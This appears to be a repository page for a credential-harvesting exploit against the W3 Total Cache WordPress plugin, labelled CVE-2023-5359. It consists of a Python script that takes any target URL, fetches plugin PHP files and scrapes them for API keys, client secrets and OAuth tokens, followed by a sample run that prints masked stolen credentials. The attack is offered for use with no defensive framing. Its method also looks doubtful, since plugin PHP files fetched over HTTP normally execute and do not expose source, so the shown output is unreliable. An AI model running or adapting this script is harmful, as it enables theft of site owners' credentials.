# Cleartext-Storage-vulnerability-CVE-2023-5359-in-W3-Total-Cache
Targets versions ≤2.7.5 vulnerable to CVE-2023-5359

-------------------
import requests
import re
from urllib.parse import urljoin

# Common paths where credentials are stored
CREDENTIAL_PATHS = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php",
    "/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php"
]

def check_w3tc_presence(target_url):
    """Check if W3 Total Cache is installed"""
    try:
        response = requests.get(target_url, timeout=10)
        if "wp-content/plugins/w3-total-cache" in response.text:
            return True
        return False
    except Exception as e:
        print(f"Connection error: {str(e)}")
        return False

def extract_credentials(target_url):
    """Extract plaintext credentials from vulnerable files"""
    credentials = {}
    
    for path in CREDENTIAL_PATHS:
        full_url = urljoin(target_url, path)
        try:
            response = requests.get(full_url, headers={"User-Agent": "Mozilla/5.0"})
            if response.status_code == 200:
                # Search for common credential patterns
                matches = re.findall(
                    r"(client_id|client_secret|api_key|oauth_token)\s*=\s*['\"]([a-zA-Z0-9-_]+)['\"]",
                    response.text
                )
                if matches:
                    credentials[path] = dict(matches)
        except Exception as e:
            continue
            
    return credentials

def main():
    target = input("Enter target URL (e.g., https://example.com): ").strip()
    
    if not check_w3tc_presence(target):
        print("[-] W3 Total Cache not detected")
        return
    
    print("[+] W3 Total Cache detected. Checking for CVE-2023-5359...")
    
    creds = extract_credentials(target)
    
    if creds:
        print("\n[!] Sensitive credentials found:")
        for filepath, data in creds.items():
            print(f"\nFile: {filepath}")
            for key, value in data.items():
                print(f"  {key}: {value}")
    else:
        print("[+] No credentials found in common locations")

if __name__ == "__main__":
    main()
----------------

Enter target URL (e.g., https://example.com): https://vulnerable-site.com
[+] W3 Total Cache detected. Checking for CVE-2023-5359...

[!] Sensitive credentials found:

File: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
  client_id: GOxxxxxxxxxxxx78
  client_secret: ABcdEFghIJklMNopQRstUVwxYZ

File: /wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
  api_key: AiiiihIwJKLmnopkhdhsQRSTUVWXYZ-123456
